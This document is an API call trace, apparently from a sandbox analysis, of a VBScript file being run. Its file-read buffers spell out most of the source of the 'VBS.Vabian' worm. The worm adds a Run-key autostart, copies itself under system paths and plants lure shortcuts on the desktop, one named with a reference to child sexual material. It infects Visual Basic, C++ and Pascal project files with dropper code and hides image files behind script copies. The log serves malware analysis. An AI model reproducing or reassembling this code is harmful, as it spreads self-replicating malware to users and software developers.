| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001ba Registry => 0x000001c2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001c6 Registry => 0x000001ba SubKey => InprocServer32 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW | Handle => 0x000001c6 Data => B\x00o\x00t\x00h\x00\x00\x00 ValueName => ThreadingModel | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001c6 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001ba | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001ba Registry => 0x80000000 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001ba SubKey => TreatAs | FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001ba | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrLoadDll | Flags => 1302856 BaseAddress => 0x735a0000 FileName => C:\WINDOWS\system32\scrrun.dll | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => DllGetClassObject FunctionAddress => 0x735a2861 ModuleHandle => 0x735a0000 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x735a2655 ModuleHandle => 0x735a0000 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SxsOleAut32RedirectTypeLibrary FunctionAddress => 0x7e746129 ModuleHandle => 0x7e720000 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExA |
Handle => 0x000001ba Registry => 0x80000000 SubKey => TypeLib |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001ba SubKey => {420B2830-E718-11CF-893D-00A0C9054228} |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExA |
Handle => 0x000001ca Registry => 0x000001c6 SubKey => 1.0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExA |
Handle => 0x000001ce Registry => 0x000001ca SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001d2 Registry => 0x000001ce SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001d2 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001ce Registry => 0x000001ca SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001d2 Registry => 0x000001ce SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001d2 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00s\x00c\x00r\x00r\x00u\x00n\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\WINDOWS\system32\scrrun.dll DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => PE\x00\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => L\x01\x04\x00\x18\xa1\x02H\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x02! FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => \x10\x01\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => .text\x00\x00\x00\x83\xd5\x01\x00\x00\x10\x00\x00\x00\xe0\x01\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00` FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => .data\x00\x00\x000\x08\x00\x00\x00\xf0\x01\x00\x00\x10\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => .rsrc\x00\x00\x00`~\x00\x00\x00\x00\x02\x00\x00\x80\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00@ FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x02\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \xf0\x02\x00\x800\x00\x00\x80 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => \x18\x00\x02\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x03\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \xe0\x02\x00\x80H\x00\x00\x80 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => \x00\x02\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x07\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => T\x00Y\x00P\x00E\x00L\x00I\x00B\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => X\x00\x02\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x01\x00\x00\x00\xf0\x00\x00\x80 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x04\x00\x00 \x02\x00\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => x\x06\x02\x00\xe4\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => \x00\xa0\x02\x00\x00\x00\x00\x00\x00\xa0\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x000001d4 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013d770 SectionHandle => 0x000001d4 ProcessHandle => 0xffffffff BaseAddress => 0x00f70000 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => Rem VBS.W32.I-worm.Vabian
Rem Script Project Infector [pas,frm,cpp]
Rem By Psychologic aka Puppy
Rem Mailto : Psychologic@hot FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => mail.com
'sending filename
'x=msgbox(Wscript.ScriptName, 0, "Title")
'malware expires....
date2 = #06/01/2018#
date1 = FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => Date 'get current date
'x = msgBox(date1,0,"sadd")
'x1 = msgBox(date2,0,"sad1")
'x2 = msgBox(diff,0,"diff")
Do while FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => true
If date1 < date2 Then
Exit Do
End If
WScript.Sleep 1000
Loop
On error resume next
Set executor = wscript.Cr FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => eateObject("WScript.Shell")
Set fso = CreateObject("scripting.FileSystemObject")
Set drop = Fso.opentextfile(wscript.scriptful FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => lname, 1)
src = drop.readall
drop.close
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\"
executor.regwrite "HKEY_CLASSES_ROOT FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \VXFile\DefaultIcon\","C:\PROGRA~1\INTERN~1\iexplore.exe,8"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptEngine\","VBScrip FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => t"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
executor.regwrite " FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => HKEY_CLASSES_ROOT\VXFile\Shell\Open\Command\","C:\WINDOWS\WScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regwrite "H FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => KEY_CLASSES_ROOT\VXFile\Shell\Play\Command\","C:\WINDOWS\COMMAND\CScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regw FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => rite "HKEY_CLASSES_ROOT\VXFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
executor.regwr FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => ite "HKEY_CLASSES_ROOT\.VX\","VXFile"
executor.regwrite "HKEY_CLASSES_ROOT\VX\CLSID\","{B54F3741-5B07-11cf-A4B0-00AA004A55E8}"
FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer =>
executor.regwrite "HKEY_CLASSES_ROOT\VX\OLEScript\"
fso.copyfile wscript.scriptfullname,"C:\windows\backup_vabian.sys"
fso. FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => copyfile wscript.scriptfullname,"C:\windows\Vabian.VX"
if fso.FolderExists("C:\Documents and Settings\All Users\Desktop") the FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => n
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\Documents and Sett FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => ings\All Users\Desktop\Sex-Vabian.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.VX")
msc.IconLo FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => cation = Shell.ExpandEnvironmentStrings("C:\windows\system32\mspaint.exe, 0")
msc.WindowStyle = 4
msc.Save
end if
if fso FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => .FolderExists("C:\windows\Desktop") then
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shel FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => l.CreateShortCut("C:\windows\Desktop\Sex-Children.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.V FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => X")
msc.WindowStyle = 4
msc.Save
end if
set opendroperfrm = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsour FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => cefrm = ""
oneline = ""
do while opendroperfrm.readline <> "'VabianMarker"
oneline = opendroperfrm.readline
frmformat = FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => replace(oneline,chr(34),chr(34)&"&chr(34)&"&chr(34))
fullline = "? #1," & frmformat
allsourcefrm = allsourcefrm & vbcrlf & FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => fullline
loop
opendroperfrm.close
set opendropercpp = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsourcecpp = FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => ""
oneline1 = ""
do while opendropercpp.readline <> "'VabianMarker"
oneline1 = ""
oneline1 = opendropercpp.readline
oneb FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => yone = len(oneline1)
for i = 1 to onebyone
read34 = mid(oneline1,i,1)
if read34 = chr(34) then
m = ",34"
else
FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => m = ""
end if
all = all & m
next
cppformat1 = replace(oneline1,chr(34),"%c")
cppformat = replace(cppformat1,"\","\\" FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => )
fullline1 = "fprintf(mvbswe," & chr(34) & cppformat & "\n" & chr(34) & all & ");"
allsourcecpp = allsourcecpp & vbcrlf & FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => fullline1
all = ""
loop
opendropercpp.close
set opendroperpas = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
all FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => sourcepas = ""
oneline2 = ""
do while opendroperpas.readline <> "'VabianMarker"
oneline2 = ""
oneline2 = opendroperpas.rea FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => dline
fullline2 = "writeln (mvbswe,'" & oneline2 & "');"
allsourcepas = allsourcepas & vbcrlf & fullline2
loop
opendroper FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => pas.close
winfold = fso.getspecialfolder(0)
backpath = winfold & "\vabian.vbs"
executor.regwrite "HKLM\SOFTWARE\Microsoft FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \Windows\CurrentVersion\Run\Vabian", "wscript.exe " & backpath & " %"
fso.copyfile wscript.scriptfullname, backpath
ranpay = i FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => nt(rnd * 9)+1
if ranpay > 5 then
set payload = fso.CreateTextFile("C:\payload.txt")
payload.write "VBS.Vabian" & vbcrlf & FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => "-------------" & vbcrlf
payload.write "Dear user ... " & vbcrlf & "I just want to tell you something" & vbcrlf
payload.wri FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => te "Your computer has been infected with virus,it called VBS.Vabian" & vbcrlf
payload.write "If you are an Programer, go look FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => at your project check all your frm or cpp or pas files" & vbcrlf
payload.write "Cos that is the victim" & vbcrlf & "Ok I have FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => to go now" & vbcrlf
payload.write "--------------------------------------------------" & vbcrlf
payload.write "Made by Psyc FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => hologic aka Puppy - Indonesian hip-hop singer"
payload.close
executor.run "C:\payload.txt"
end if
Set Drives=fso.drives FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer =>
For Each Drive in Drives
If drive.isready then
FindVictim drive
end If
Next
function FindVictim(path)
on error FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => resume next
Set Folder=fso.getfolder(path)
Set Files = folder.files
For Each File in files
If fso.GetExtensionName(file FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => .path)="frm" then
on error resume next
set readfrmmarker = fso.OpenTextFile(file.path,1, True)
frmmarker = readfrmmarker.r FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => eadline
frmreadall = readfrmmarker.readall
if frmmarker <> "Rem W32.hllp.Vabian" then
set readfrmmarker = fso.CreateTex FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => tFile(file.path, True)
readfrmmarker.write "Rem W32.hllp.Vabian" & vbcrlf & frmreadall & vbcrlf
readfrmmarker.write "Pri FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => vate Sub form_unload(cancel As Integer)" & vbcrlf
readfrmmarker.write "On Error GoTo err:" & vbcrlf
readfrmmarker.write FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => "Open " & chr(34) & "C:\vabian.vbs" & chr(34) & " for output as #1" & vbcrlf
readfrmmarker.write allsourcefrm & vbcrlf & "c FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => lose #1" & vbcrlf & "shell " & chr(34) & "C:\vabian.vbs" & chr(34) & vbcrlf
readfrmmarker.write "msgbox " & chr(34) & "Your FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => Program has been infected by Vabian virus Created by Psychologic" & chr(34) & ",VbInformation," & chr(34) & "W32.VBS.Vabian" & c FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => hr(34)
readfrmmarker.write vbcrlf & "exit sub" & vbcrlf & "err:" & vbcrlf & "End sub" & vbcrlf
readfrmmarker.close
en FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => d if
end if
If fso.GetExtensionName(file.path)="cpp" then
on error resume next
set readcppmarker = fso.OpenTextFile( FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => file.path,1, True)
cppmarker = readcppmarker.readline
cppreadall = readcppmarker.readall
if mid(cppreadall,len(cppreadall FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => ),1) = "}" then
cppreadall1 = replace(cppreadall,mid(cppreadall,len(cppreadall),1),"")
end if
if cppmarker <> "// W3 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => 2.hllp.Vabian" then
set readcppmarker = fso.CreateTextFile(file.path, True)
readcppmarker.write "// W32.hllp.Vabian" & v FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => bcrlf & "FILE *Vabian;" & vbcrlf
readcppmarker.write cppreadall & "wormvabian = fopen("&chr(34)&"vabian.vbs"&chr(34)&","&chr FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => (34)&"wt"&chr(34)&");" & vbcrlf
readcppmarker.write "if(wormvabian)"&vbcrlf&"{"& allsourcecpp &vbcrlf&"}" & vbcrlf
readc FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => ppmarker.write "ShellExecute(NULL, "&chr(34)&"open"&chr(34)&", "&chr(34)&"vabian.vbs"&chr(34)&", NULL, NULL, SW_SHOWNORMAL);" & FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => vbcrlf
readcppmarker.write "}" & vbcrlf
readcppmarker.close
end if
end if
If fso.GetExtensionName(file.path)= FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => "pas" then
on error resume next
set readpasmarker = fso.OpenTextFile(file.path,1, True)
pasmarker = readpasmarker.readline FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer =>
pasreadall = readpasmarker.readall
if pasmarker <> "{ W32.hllp.Vabian }" then
set readpasmarker = fso.CreateTextFile(f FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => ile.path, True)
readpasmarker.write "{ W32.hllp.Vabian }" & vbcrlf & pasreadall & vbcrlf
readpasmarker.write "procedure FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => " & "TForm1.FormClose(Sender: TObject; var Action: TCloseAction);" & vbcrlf
readpasmarker.write "begin" & vbcrlf & "AssignFi FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => le (Vabian,'C:\Windows\STARTM~1\programs\startup\Vabian.vbs');" & vbcrlf
readpasmarker.write "Rewrite (Vabian);" & vbcrlf & FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => allsourcepas & vbcrlf & "CloseFile(Vabian);" & vbcrlf
readpasmarker.close
end if
end if
If fso.GetExtensionName(fil FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => e.path)="bmp" or fso.GetExtensionName(file.path)="jpg" or fso.GetExtensionName(file.path)="gif" or fso.GetExtensionName(file.pat FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => h)="ico" then
For i = 1 To 8
fvar = Chr(Int(22 * Rnd) + 97)
varall = fvar & varall
Next
on error resume next
FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => bathelp = file.path & ".bat"
Set dropper = Fso.Createtextfile(bathelp, True)
dropper.writeline "Attrib +h " & file.path
FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer =>
dropper.Close
executor.run bathelp
fso.Deletefile bathelp
vbscopy = file.path & ".VX"
Set dropper2 = Fso.Createte FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => xtfile(vbscopy, True)
dropper2.write "Set " & varall & " = wscript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => & vbcrlf & "Sucke.run " & chr(34) & file.path & chr(34) & vbcrlf
dropper2.write scr
dropper2.Close
end if
next
Se FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => t Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
FindVictim Subfolder.path
Next
end function
Set FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
